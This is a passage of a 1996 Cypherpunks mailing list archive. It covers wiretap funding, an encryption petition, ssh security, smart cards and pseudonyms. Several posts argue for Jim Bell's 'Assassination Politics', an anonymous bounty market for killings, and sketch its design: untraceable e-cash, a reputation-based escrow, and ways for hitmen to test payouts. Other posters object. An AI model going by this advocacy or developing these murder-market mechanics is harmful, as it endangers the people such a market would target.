programming > PGP keys at: http://w3.citenet.net/users/jf_avon > ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 > > // declan at eff.org // I do not represent the EFF // declan at well.com // From stewarts at ix.netcom.com Thu Sep 26 23:24:42 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 27 Sep 1996 14:24:42 +0800 Subject: Is "Black Unicorn" a lawyer, or just a nym used by a lawyer? Message-ID: <199609270017.RAA18940@dfw-ix7.ix.netcom.com> Tim May said, in a discussion on another topic While BU is a lawyer, and I am not, I maintain [........] Is it correct to say that "Black Unicorn is a lawyer", or only that the nym "Black Unicorn" is used by a person who's a lawyer under another name? "Black Unicorn" at least doesn't appear to be a _practicing lawyer_, though maybe [name used for legal work by person who also uses nym "Black Unicorn"] is a practicing lawyer. Tim's signature file no longer asserts that he's a Licensed Ontologist, but this seems to be the kind of question you'd ask a L.O. if you knew one. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From brock at well.com Thu Sep 26 23:33:17 1996 From: brock at well.com (Brock N. Meeks) Date: Fri, 27 Sep 1996 14:33:17 +0800 Subject: CWD--Wiretap In the Night Message-ID: <199609262154.OAA12076@well.com> CyberWire Dispatch // September // Copyright (c) 1996 // Jacking in from the "Smoked Filled Room" Port: Washington, DC -- Federal provisions funding the digital telephony bill and roving wiretaps, surgically removed earlier this year from an anti-terrorism bill, have quietly been wedged into a $600 billion omnibus spending bill. The bill creates a Justice Department "telecommunications carrier compliance fund" to pay for the provisions called for in the digital telephony bill, formally known as the Communications Assistance in Law Enforcement Act (CALEA). In reality, this is a slush fund. Congress originally budgeted $500 million for CALEA, far short of the billions actually needed to build in instant wiretap capabilities into America's telephone, cable, cellular and PCS networks. This bill now approves a slush fund of pooled dollars from the budgets of "any agency" with "law enforcement, national security or intelligence responsibilities." That means the FBI, CIA, NSA and DEA, among others, will now have a vested interest in how the majority of your communications are tapped. The spending bill also provides for "multipoint wiretaps." This is the tricked up code phase for what amounts to roving wiretaps. Where the FBI can only tap one phone at a time in conjunction with an investigation, it now wants the ability to "follow" a conversation from phone to phone; meaning that if your neighbor is under investigation and happens to use your phone for some reason, your phone gets tapped. It also means that the FBI can tap public pay phones... think about that next time you call 1-800-COLLECT. In addition, all the public and congressional accountability provisions for how CALEA money was spent, which were in the original House version (H.R. 3814), got torpedoed in the Senate Appropriations Committee. Provisions stripped out by the Senate: -- GONE: Money isn't to be spent unless an implementation plan is sent to each member of the Judiciary Committee and Appropriations committees. -- GONE: Requirement that the FBI provide public details of how its new wiretap plan exceeds or differs from current capabilities. -- GONE: Report on the "actual and maximum number of simultaneous surveillance/intercepts" the FBI expects. The FBI ran into a fire storm earlier this year when it botched its long overdue report that said it wanted the capability to tap one out of every 100 phones *simultaneously*. Now, thanks to this funding bill, rather than having to defend that request, it doesn't have to say shit. -- GONE: Complete estimate of the full costs of deploying and developing the digital wiretapping plan. -- GONE: An annual report to Congress "specifically detailing" how all taxpayer money -- YOUR money -- is spent to carry out these new wiretap provisions. "No matter what side you come down on this (digital wiretapping) issue, the stakes for democracy are that we need to have public accountability," said Jerry Berman, executive director of the Center for Democracy and Technology. Although it appeared that no one in congress had the balls to take on the issue, one stalwart has stepped forward, Rep. Bob Barr (R-Ga.). He has succeeded in getting some of the accountability provisions back into the bill, according to a Barr staffer. But the fight couldn't have been an easy one. The FBI has worked congress relentlessly in an effort to skirt the original reporting and implementation requirements as outlined in CALEA. Further, Barr isn't exactly on the FBI's Christmas card list. Last year it was primarily Barr who scotched the funding for CALEA during the 104th Congress' first session. But Barr has won again. He has, with backing from the Senate, succeeded in *putting back* the requirement that the FBI must justify all CALEA expenditures to the Judiciary Committee. Further, the implementation plan, "though somewhat modified" will "still have some punch," Barr's staffer assured me. That includes making the FBI report on its expected capacities and capabilities for digital wiretapping. In other words, the FBI won't be able to "cook the books" on the wiretap figures in secret. Barr also was successful in making the Justice Department submit an annual report detailing its CALEA spending to Congress. However, the funding for digital wiretaps remains. Stuffing the funding measures into a huge omnibus spending bill almost certainly assures its passage. Congress is twitchy now, anxious to leave. They are chomping at the bit, sensing the end of the 104th Congress' tortured run as the legislative calender is due to run out sometime early next week. Then they will all literally race from Capitol Hill at the final gavel, heading for the parking lot, jumping in their cars like stock car drivers as they make a made dash for National Airport to return to their home districts in an effort to campaign for another term in the loopy world of national politics. Congress is "going to try to sneak this (spending bill) through the back door in the middle of the night," says Leslie Hagan, legislative director for the National Association of Criminal Defense Lawyers. She calls this a "worst case scenario" that is "particularly dangerous" because the "deliberative legislative process is short-ciricutied." Such matters as wiretapping deserve to be aired in the full sunlight of congressional hearings, not stuffed into an 11th hour spending bill. This is legislative cowardice. Sadly, it will most likely succeed. And through this all, the Net sits mute. Unlike a few months ago, on the shameful day the Net cried "wolf" over these same provisions, mindlessly flooding congressional switchboards and any Email box within keyboard reach, despite the fact that the funding provisions had been already been stripped from the anti-terrorism bill, there has been no hue-and-cry about these most recent moves. Yes, some groups, such as the ACLU, EPIC and the Center for Democracy and Technology have been working the congressional back channels, buzzing around the frenzied legislators like crazed gnats. But why haven't we heard about all this before now? Why has this bill come down to the wire without the now expected flurry of "alerts" "bulletins" and other assorted red-flag waving by our esteemed Net guardians? Barr's had his ass hanging in the wind, fighting FBI Director Louis "Teflon" Freeh; he could have used some political cover from the cyberspace community. Yet, if he'd gone to that digital well, he'd have found only the echo of his own voice. And while the efforts of Rep. Barr are encouraging, it's anything from a done deal. "As long as the door is cracked... there is room for mischief," said Barr's staffer. Meaning, until the bill is reported and voted on, some snapperhead congressman could fuck up the process yet again. We all caught a bit of a reprieve here, but I wouldn't sleep well. This community still has a lot to learn about the Washington boneyard. Personally, I'm a little tired of getting beat up at every turn. Muscle up, folks, the fight doesn't get any easier. Meeks out... ------------ Declan McCullagh contributed to this report. From shabbir at vtw.org Thu Sep 26 23:39:00 1996 From: shabbir at vtw.org (Voters Telecommunications Watch) Date: Fri, 27 Sep 1996 14:39:00 +0800 Subject: INFO: Netscape CEO Jim Barksdale signs the pro-crypto petition! (9/26/96) Message-ID: <199609270416.AAA07147@panix3.panix.com> ============================================================================= ____ _ _ _ / ___|_ __ _ _ _ __ | |_ ___ | \ | | _____ _____ | | | '__| | | | '_ \| __/ _ \ _____| \| |/ _ \ \ /\ / / __| | |___| | | |_| | |_) | || (_) |_____| |\ | __/\ V V /\__ \ \____|_| \__, | .__/ \__\___/ |_| \_|\___| \_/\_/ |___/ |___/|_| MORE NET LUMINARIES JOIN THOUSANDS IN SIGNING PRO-ENCRYPTION PETITION http://www.crypto.com/petition/ JUDICIARY HEARING ON HR 3011 (9/25/96) Date: September 25, 1996 URL:http://www.crypto.com/ crypto-news at panix.com If you redistribute this, please do so in its entirety, with the banner intact. ----------------------------------------------------------------------------- Table of Contents Introduction Join Netscape CEO Jim Barksdale as he signs the pro-crypto petition! How to receive crypto-news Press contacts ----------------------------------------------------------------------------- INTRODUCTION This is a busy last few days for Washington. In the midst of it all, the Judiciary committee held a hearing HR 3011, beginning the process of educating Congress for next year, and bringing in the Administration for a regular public drubbing about their antiquated encryption regulations. The very same day, WWW.Crypto.Com was honored to have Netscape CEO Jim Barksdale sign onto petition that supports legislation that would: -Relax export controls on encryption technology; -Prohibit the government from imposing "Key Escrow" solutions domestically; and -Recognize the importance of privacy and security for the future of electronic commerce, individual liberty, and the success of the Internet. Jim Barksdale is no stranger to the encryption debate. He testified at the July 25th hearing on the pro-encryption Pro-CODE bill (S1726). You can hear him in his own words by listening to the RealAudio transcript of the hearing cybercast at http://www.crypto.com/events/072596/ We'll be continuing the petition throughout the break and the election and use it next year to support the encryption legislation that will surely be introduced again. Be a part of it by signing the petition with Jim Barksdale at http://www.crypto.com/petition/ ! ----------------------------------------------------------------------------- JOIN NETSCAPE CEO JIM BARKSDALE IN FIGHTING FOR YOUR PRIVACY! The following petition can be signed onto at http://www.crypto.com/petition/ The Information Revolution is being held hostage by an outdated, Cold War-era U.S. encryption policy. Current U.S. export controls and other initiatives are slowing the widespread availability of strong encryption products, endangering the privacy and security of electronic communications, harming the competitiveness of U.S. businesses, and threatening the future of electronic commerce and the growth of the Global Information Infrastructure (GII). We the undersigned Internet users and concerned citizens strongly support Congressional efforts to address this critical issue. Bills are currently pending in both Houses of Congress which would: -Relax export controls on encryption technology; -Prohibit the government from imposing "Key Escrow" solutions domestically; and -Recognize the importance of privacy and security for the future of electronic commerce, individual liberty, and the success of the Internet. We urge Congress to act NOW to enact a U.S. encryption policy that promotes electronic privacy and security. Add your name to his at http://www.crypto.com/petition/ ! ----------------------------------------------------------------------------- HOW TO RECEIVE CRYPTO-NEWS To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com) or send mail to majordomo at panix.com with "subscribe crypto-news" in the body of the message. To unsubscribe, send a letter to majordomo at panix.com with "unsubscribe crypto-news" in the body. ----------------------------------------------------------------------------- PRESS CONTACT INFORMATION Press inquiries on Crypto-News should be directed to Shabbir J. Safdar (VTW) at +1.718.596.2851 or shabbir at vtw.org Jonah Seiger (CDT) at +1.202.637.9800 or jseiger at cdt.org ----------------------------------------------------------------------------- End crypto-news ============================================================================= From jf_avon at citenet.net Thu Sep 26 23:40:47 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Fri, 27 Sep 1996 14:40:47 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <9609270430.AA06876@cti02.citenet.net> On 26 Sep 96 at 20:46, snow wrote: > Having been a firefighter for about 4 years, I can say that for > > small fires water works quite a bit better. For larger fires (over a > hundred acres or so) setting a backfire, or burning out the fuel in > the direction the fire is probably going to go is a hell of a lot > easier than hauling millons and millions of gallons or > blood^h^h^h^h^h water. > > Petro, Christopher C. > petro at suba.com > snow at smoke.suba.com Well, let's not debate over firefighting, a lousy analogy... As long as Canadair sells water bombers, let them do. It brings money to Montreal... :) As for Jim Bell, he would probably say that he just proposes to use your techniques. :) jfa From jimbell at pacifier.com Thu Sep 26 23:49:06 1996 From: jimbell at pacifier.com (jim bell) Date: Fri, 27 Sep 1996 14:49:06 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <199609270426.VAA18253@mail.pacifier.com> At 11:00 PM 9/25/96 -0700, Dale Thorn wrote: >jim bell wrote: >> That's about it. I long ago noticed the similarity between AP and the >> fictional Gort. >> Problem is, Gort would have to be programmed. How would you write such >> a program? Governments would want their hand in it. They'd insist on >> "government exceptions" to rules, like: "All violence is forbiddden! >> (except for violence by duly authorized government employees!)" >> Not very practical. > >Indeed it may not be practical to try such a program on current >computers. I've had thoughts for some time about an analogy where each >person in a civilization represents a cell in a single brain, and so on, >so perhaps AP is merely a portion of the program for this "brain". As >to what happens when you try to concentrate a disproportionate amount of >the programming task into a few hands, that appears to be the situation >we have now. Exactly correct. The current system is intended to present the illusion that it is the product of the voters, where it is really defined by the political establishment. Bill Stewart pointed out (correctly) that what I'm proposing is "mechanism without a built-in policy." While this may appear to be a bit reckless, the reason I'm confident it will work is that the status quo has a _throughly_corrupt_ policy, a policy which is actively hostile to the interests and rights of the average citizen. Replacing that system with one that is merely neutral is a great improvement, particularly if there is no way for that policy to be hijacked by a tiny minority of the public. Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Fri Sep 27 00:01:53 1996 From: jimbell at pacifier.com (jim bell) Date: Fri, 27 Sep 1996 15:01:53 +0800 Subject: AP Protocol Failures [NOISE] Message-ID: <199609270426.VAA18243@mail.pacifier.com> At 07:37 PM 9/26/96 -0500, snow wrote: >> >> Troops are in Northern Ireland for a very simple and depressing >> >> reason. People like Jim want to impose their will on others by force. >> But AP is great - adding more violence to Ireland is just the thing >> they need........ > > It wouldn't ADD more violence. I had intended to respond to Bill Stewart's comment before this. I was surprised that he would suggest that AP would (necessarily?) cause "more violence." To me, it's obvious that it will cause _different_ violence, and I strongly suspect it'll actually reduce the total violence level, and certainly will do so in the long term. But far more than reducing violence, it'll reduce coercion that doesn't rise to the level of violence as well. When people AREN'T put in jail or prison for a victimless crime, I consider that a drastic reduction in coercion, and that's progress. Put fewer people in jail, and you anger fewer people, and you rob fewer people by taxation to pay for that jail, etc. >> One of the strong negatives of AP is that it leads to reverse AP - >> if you don't know _which_ Hatfield killed the latest McCoy, >> you might as well just shoot one or two Hatfield Boys at random. >> If you kill off GrandDaddy Hatfield, there's nobody to say >> "OK, let's stop shooting each other"; instead there's a bunch of >> angry grandkids, and uncles, _all_ of whom have the >> authority to say "Let's go kill the McCoy bastards who did this!" >> The protocols may work when there's one hierarchical target - >> they don't work with two. Hammurabi's law about "An eye for an eye >> and a tooth for a tooth" was a _limitation_ on the amount of vengeance >> you were allowed to take, not a minimum required vengeance. > > Putting AP into place doesn't make murder legal. You could still >be arrested, tried (depending on the jurisdiction) and punished for it. Not only that, you could use AP to kill somebody who killed SOMEBODY ELSE with AP! (which is, to me, a rather obvious fact, but one that escapes an unusually large number of people. 'course, you'd have to figure out who did it... a non-trivial task under the circumstances.) Jim Bell jimbell at pacifier.com From ses at tipper.oit.unc.edu Fri Sep 27 00:03:26 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Fri, 27 Sep 1996 15:03:26 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: Message-ID: On Thu, 26 Sep 1996, Declan McCullagh wrote: > Anonymity and nonescrowed crypto are the linchpins of AP and its more > general case, Maysian crypto anarchy. The withering of the nation-state. If I might dare a crypto-related comment as well; it also requires an absolutely trusted third-party to manage the funds and issue the ecash used to pay the murderer, (sorry, fortunate gambler). The reason why the third party must be trusted by both the payers and the gambler, and thus cannot be anonymous (only at 'best' pseduonymous) should be obvious. From snow at smoke.suba.com Fri Sep 27 00:06:16 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 15:06:16 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <9609240210.AA17228@vesuvius.ai.mit.edu> Message-ID: <199609262349.SAA00297@smoke.suba.com> Hallium said: > Troops are in Northern Ireland for a very simple and depressing > reason. People like Jim want to impose their will on others by force. > Despite prolonged attempts by each faction to assasinate the leaders of > the other they have been unsuccessful. If terrorists trained by Lybia > and Syria are unable to assasinate at will then we can be sure thaqt Jim's > band of kooks is not going to get any further. That is your problem. You can't seem to get away from the thought that somebody is trying to rule. You assume that Mr. Bell wants to be President and Supreme Dictator of the World. Remeber your introduction to formal logic? It is A or NOT A, not A or B. NOT A _can_ be B, but it can also be anything BUT A. What Mr. Bell wants, and I agree with is that NOT A. We don't want B, C, D, or any thing else, other than NOT A. I remember this set of lines from an anarchist "newspaper" from the 80's: Q: What are you going to replace the government with after you get rid of it? A: Do you replace a cancer when you remove it? We don't want to remove a leg, we want to cut out a cancer. Consider AP extreme chemiotherapy. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From jf_avon at citenet.net Fri Sep 27 00:18:08 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Fri, 27 Sep 1996 15:18:08 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <9609270422.AA06397@cti02.citenet.net> On 26 Sep 96 at 16:51, Declan McCullagh wrote: > Anonymity and nonescrowed crypto are the linchpins of AP and its > more general case, Maysian crypto anarchy. The withering of the > nation-state. Whatever you want to call it. > > To prevent it, governments will ban both. A criminal law, passed in > the wake of say a bombing this fall in Washington, DC, banning > nonescrowed crypto. (Freeh will assert he has evidence the > terrorists used PGPhone.) And another law banning online anonymity. I agree with the prediction but the cause will probably not be AP. AP could probably be run from BBS and direct link over a very informal and loose network made out of individual modem connections. I think it is very unlikely it would get succesfully stopped. It could even be run from physically exchanged diskettes. It would run slowly, but still, it would run. OTOH, the "Maysian" crypto anarchy will be a much more immediate problem to govts. "L'argent est le nerf de la guerre",or, loosely translated: "money is war's fuel" as we say... When they start getting financially starved, they'll have to increase taxation but the population already have them in very low esteem... AP, with a properly structured media campaing, will make govts heroes, Maysian anarchy will make them seen as looters. Did I put my foot in my mouth again? > What then, Mr. Bell? > > -Declan > // declan at eff.org // I do not represent the EFF // declan at well.com Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Finest Limoges porcelain and crystal JFA Technologies, R&D consultant physicists and engineers, LabView programming PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From jf_avon at citenet.net Fri Sep 27 00:28:24 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Fri, 27 Sep 1996 15:28:24 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <9609270443.AA07590@cti02.citenet.net> On 27 Sep 96 at 0:21, Simon Spero wrote: > On Thu, 26 Sep 1996, Declan McCullagh wrote: > > > Anonymity and nonescrowed crypto are the linchpins of AP and its > > more general case, Maysian crypto anarchy. The withering of the > > nation-state. > > If I might dare a crypto-related comment as well; it also requires > an absolutely trusted third-party to manage the funds and issue the > ecash used to pay the murderer, (sorry, fortunate gambler). The > reason why the third party must be trusted by both the payers and > the gambler, and thus cannot be anonymous (only at 'best' > pseduonymous) should be obvious. For the payer, the ammount involved is so small that he might thing it is worth a shot to put the price of two bottles of beer "just in case" it works. As the system gets known, it'll gain reputation. For the hitman, this is another story, but there is a way. AP, a sensationalistically choosen name (No, Jim, I know... you intended it only as a joke) very badly describes what the server does. It could accept donations for all sorts of things, many of them being legally unconsequential. So, a potential hitman group could make donations for anybody who would predict any kind of event and see if they would pay. The server could not even know if these would be integrity tests or legitimate donations. IMO, there is only one way to prevent AP: it is by preventing the advent of e-cash. Making it illegal to issue such currency, and seize and prosecute heavily if any of it is found. This would includes, of course, gold (or other material value) e-tokens, etc. It will come from a total control of money. Can it be done? I doubt it very stronly. jfa Did you give away a copy of PGP to a friend today? Please Cc me any reply, I am not on Cypherpunks anymore. Thanks. From attila at primenet.com Fri Sep 27 00:53:29 1996 From: attila at primenet.com (attila) Date: Fri, 27 Sep 1996 15:53:29 +0800 Subject: Is "Black Unicorn" a lawyer, or just a nym used by a lawyer? In-Reply-To: <199609270017.RAA18940@dfw-ix7.ix.netcom.com> Message-ID: <199609270540.XAA21446@InfoWest.COM> In <199609270017.RAA18940 at dfw-ix7.ix.netcom.com>, on 09/26/96 at 05:17 PM, Bill Stewart said: = .Tim May said, in a discussion on another topic = . While BU is a lawyer, and I am not, I maintain = . [........] = .Is it correct to say that "Black Unicorn is a lawyer", or only that = .the nym "Black Unicorn" is used by a person who's a lawyer under = .another name? "Black Unicorn" at least doesn't appear to be a = ._practicing lawyer_, though maybe [name used for legal work by = .person who also uses nym "Black Unicorn"] is a practicing lawyer. = .Tim's signature file no longer asserts that he's a Licensed = .Ontologist, but this seems to be the kind of question you'd ask a = .L.O. if you knew one. we've gone around more than once on this topic in the past few years. tim either knows exactly who NU is, or has it narrowed to a very short list. Someone else actually met BU maybe a year ago. there are other indications. BU claims association with a given location of which I am _very_ familiar. the crest belongs to a specific lineage, of which I have a direct connection to about 300 years ago. BU has a past "life," I have a past "life," and the two are related --but you will not "hear" the "truth," calling it "fiction," anyway. BU is a lawyer. and he has done a _great_ deal more with his degree than I, who refused to practice in the U.S. Is BU currently a practicing lawyer? does it matter? BU is extremely well researched, and current. I suspect BU deals primarily with accounting, funding, and assets management, the details of which are irrelevant. If I needed a solid opinion, backed by existing law cites, and conflicting decisions, I would trust BU --and, I am plenty fiesty, need I say more? I do not have a "need to know" BU's "real name" any more than BU or anyone else needs to know mine. I think we could find each others with a few phone calls were it to be necessary, or one party asked.... Reality is what you make of it... and, if curiosity says the cat wishes to give up one life, ask tcm; I think he knows both names. 'nuff said? From tcmay at got.net Fri Sep 27 01:14:40 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 27 Sep 1996 16:14:40 +0800 Subject: Is "Black Unicorn" a lawyer, or just a nym used by a lawyer? In-Reply-To: <199609270017.RAA18940@dfw-ix7.ix.netcom.com> Message-ID: At 5:17 PM -0700 9/26/96, Bill Stewart wrote: >Tim's signature file no longer asserts that he's a Licensed Ontologist, >but this seems to be the kind of question you'd ask a L.O. if you knew one. > Yeah, I got some "What's an ontologist?" questions. One person I told to look it up in a dictionary. Then he came back with a "OK, so I looked it up. Why's a license needed?" (I also got two responses asking why I was talking about cancer.) --Tim We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From hallam at ai.mit.edu Fri Sep 27 01:21:31 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Fri, 27 Sep 1996 16:21:31 +0800 Subject: Weaknesses in Smart Cards? (Re: FLA_wed) In-Reply-To: <52fcje$6ib@life.ai.mit.edu> Message-ID: <324B6D5E.167E@ai.mit.edu> Its worse than that. The Bellcore piece was presented as being about a possible weakness in MONDEX. In fact MONDEX does not use the cryptographic technique investigated. Its a symmetric key (DES) based system. I would immagine they would keep a symmetric component even if they go for a public key system. BTW if you think carefully about MONDEX you will note that a public key system does not improve security. The system depends on private keys embedded in the devices. There is no value in having the devices use public key signatures over symetric ones. Phill PS whats the betting that anyone at a high profile site who happens to be offline for a few hours to (say) change service providers will be reported as having been "hacked"? From nobody at cypherpunks.ca Fri Sep 27 01:23:29 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Fri, 27 Sep 1996 16:23:29 +0800 Subject: ssh - How widely used? In-Reply-To: Message-ID: <199609270615.XAA15801@abraham.cs.berkeley.edu> > Looks like a nice little implementation. > > Comments anyone? Yup. Really nifty package that has been out (for unix) for about a year. Unfortunately, the author is turning it into a commerial product, so it may not be freely available in the future. There is now a Windows port, but it is entirely a commecial product. Source is not available. Though ssh is on the whole a nifty product, the unix version contained a number of nasty implementation bugs that opened large security holes. These were found because source code was made available. I wouldn't trust the Windows version. It seems inevitable that there will be some bugs in it, but unlike the Unix version, "good guys" are a lot less likely to find and report them. From chad at lycos.com Fri Sep 27 01:35:10 1996 From: chad at lycos.com (Chad Dougherty) Date: Fri, 27 Sep 1996 16:35:10 +0800 Subject: ssh - How widely used? In-Reply-To: Message-ID: <199609270608.CAA24129@rat.eng.lycos.com> -----BEGIN PGP SIGNED MESSAGE----- Adam Shostack writes: > Theres a windows version, mac is under vauge development. SSH > is pretty cool, but the code base is somewhat messy, and its shows > signs of its origins in things like systems calls not having their > return values checked. > > Despite all this, I use it, like it, and recomend it for use > in systems not likely to come under attack by professionals. > > Adam > Why do you say "not likely to come under attack by professionals"? Have you found security holes in it? -Chad -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface iQCVAwUBMktvVTa/vRyBMxWdAQGRsAP+PbjVCYB0FrNTY6CUCH/D5BZ02gczvMzQ 1kdlf7Lcx+GcyAosaJXgovJpA/UcIq/ShIELtuvZQNqB3JVLCL3RvYbQ0vf5o6wI QEnL5gS8uEetr2C7U/Pt2lqkwv0PTQYv/O7uKjVFAd36p0aRrbQJOkX6LpKNbbYi oDk5B9XgbK4= =4aWj -----END PGP SIGNATURE----- From alano at teleport.com Fri Sep 27 01:57:57 1996 From: alano at teleport.com (Alan Olsen) Date: Fri, 27 Sep 1996 16:57:57 +0800 Subject: Tamper-Resistant Software from INTEL Message-ID: <3.0b16.32.19960926211900.00b94b20@mail.teleport.com> At 07:57 PM 9/26/96 -0500, snow wrote: >Mr. Guthery >> Has anybody heard of tamper-resistant software in general or a method >> for tamper-resistant software from Intel in particular? > > What do you mean by "tamper resistant"? It means that if you do *ANYTHING* to try and adjust, modify, and/or configure the software, it no longer functions. Sadly, Microsoft has beat them to the punch on this technology. --- | "Remember: You can't have BSDM without BSD." - alan at ctrl-alt-del.com | |"The moral PGP Diffie taught Zimmermann unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From remailer at cypherpunks.ca Fri Sep 27 01:58:25 1996 From: remailer at cypherpunks.ca (John Anonymous MacDonald) Date: Fri, 27 Sep 1996 16:58:25 +0800 Subject: Newsgroup proposal: misc.anonymous In-Reply-To: Message-ID: <199609270522.WAA14373@abraham.cs.berkeley.edu> "Mark M." writes: > In an effort to get anonymity and message pools more widespread, I think it > would be a good idea to establish a newsgroup for anonymous message pools that > would get the same distribution as any other newsgroup in the "big 8". The > "misc" hierarchy is probably the best place for such a newsgroup since it > already carries groups like "misc.misc" and "misc.test". Does anyone have any > suggestions or objections? This sounds like a good idea. I would certainly vote for such a news group. Should the name be misc.anonymous or misc.anonymous.messages? Are alt.anonymous and alt.anonymous.messages basically to different newsgroups for exactly the same purpose, or is there some difference between them. From andrew_loewenstern at il.us.swissbank.com Fri Sep 27 01:58:59 1996 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 27 Sep 1996 16:58:59 +0800 Subject: WARNING: This Message Actually Contains a Question ReguardingCrypto! In-Reply-To: <199609241649.LAA22238@mailhub.amaranth.com> Message-ID: <9609252059.AA00824@ch1d157nwk> > I just recently downloaded copies of Blowfish & Ghost. > > Does anyone have any experiance with these two algorithims? Don't use GOST unless you think you can come up with some good S-boxes. It's pretty much only out there for educational purposes. andrew From tcmay at got.net Fri Sep 27 02:04:57 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 27 Sep 1996 17:04:57 +0800 Subject: Escrow Services In-Reply-To: Message-ID: At 12:21 AM -0400 9/27/96, Simon Spero wrote: >On Thu, 26 Sep 1996, Declan McCullagh wrote: > >> Anonymity and nonescrowed crypto are the linchpins of AP and its more >> general case, Maysian crypto anarchy. The withering of the nation-state. > >If I might dare a crypto-related comment as well; it also requires an >absolutely trusted third-party to manage the funds and issue the ecash >used to pay the murderer, (sorry, fortunate gambler). The reason why the >third party must be trusted by both the payers and the gambler, and thus >cannot be anonymous (only at 'best' pseduonymous) should be obvious. Do you consider an entity such as "Joe's Escrow--You Slay, We Pay" with an untraceable BlackNet identity to be "anonymous" or "pseudonymous"? I'd say it can be made "untraceable," but with a persistent name and reputation. How does an escrow service (and I mean the classical definition of escrow, not the newspeak definition used by the U.S. government) survive and prosper? By being in the business of releasing funds when conditions are met, and not otherwise. By not absconding with the funds. Note that in the real world, escrow services do quite well, because the continuing future revenue stream from their good reputation exceeds what they could get by "burning" any particular customer. (Sometimes by putting up a bond, which is a kind of secondary escrow. Also, escrow services can be "pinged" (tested) by lots of small transactions. (A lot of similarities between digital escrow services and digital banks.) (For more on this--a lot more--see the "escrow" entries in my Cyphernomicon.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dthorn at gte.net Fri Sep 27 04:04:12 1996 From: dthorn at gte.net (Dale Thorn) Date: Fri, 27 Sep 1996 19:04:12 +0800 Subject: Public Schools In-Reply-To: <199609270229.TAA03286@dns2.noc.best.net> Message-ID: <324B9008.17A4@gte.net> James A. Donald wrote: > Phil Fraering writes: > >> > Without vouchers, you don't say anything about the intelligence > >> > of > >> > your test subjects; to a _very_ large degree, intelligence isn't > >> > genetic. Or > Bag of shit wrote: > >> That's the political correct thing to say, but do you have any > >> scientific evidence to support this claim? > At 11:19 PM 9/25/96 -0700, Dale Thorn wrote: > > People have argued for genetic disposition to certain things, and I > > think they are sometimes (most times?) confused [...] > [Lots of meaningless hand waving hot air deleted] > > The key basic test of the power of genes is studies of identical > twins raised in different families. > They have near identical IQ's, and a wide range of > very similar behavior. > Identical twins raised in different families are more > similar than identical twins raised in the same family, > probably because of deliberate attempts to differentiate > themselves. > Except in the case of extreme environmental pressures -- > starvation, neglect, and the like, genes count for > just about everything, and environment for almost > nothing. Please excuse my bluntness, but you obviously get your info out of a book, whereas I get mine from actual experience, which I can demonstrate quite well. Your identical twins example means nothing, as it's totally likely that: 1) Few identical twins separated early are really available for study and 2) Far fewer yet would have a substantially different environment awaiting them. This is one test you'd certainly have to do purposely (separating them, that is). Your testimonial of IQ's is equally dubious, excepting you should come up with a test that measures actual intelligence. The "wide range of similar behavior" puts the torch to your argument. If you want to argue that the twins would grow nearly always to the same height, I could allow that (but still argue the point), but behavior? Please! From enzo at ima.com Fri Sep 27 04:24:41 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Fri, 27 Sep 1996 19:24:41 +0800 Subject: Call for Papers Message-ID: FYI... ---------- Forwarded message ---------- Date: Tue, 24 Sep 96 09:49:03 EDT From: Nick Maxemchuk To: apc at ee.nthu.edu.tw, apc_members at hornbill.ee.nus.sg, commsoft at cc.bellcore.com, enternet at bbn.com, ietf at CNRI.Reston.VA.US, itc at fokus.gmd.de, multicomm at cc.bellcore.com, tccc at cs.umass.edu Subject: Call for Papers CALL FOR PAPERS IEEE Journal on Selected Areas in Communications COPYRIGHT AND PRIVACY PROTECTION Significant investments are now being made worldwide to develop an infrastructure for on-line services and electronic commerce. A major impediment is the lack of effective protection of copyright for content owners and of privacy for users. Digital data can be easily copied and redistributed widely without any loss of fidelity. One promising idea is to discourage illicit distribution by watermarking digital objects with hidden copyright messages to proclaim ownership and unique identifiers to help trace pirates. The techniques of information hiding are in many ways related to mechanisms that can be used to protect the 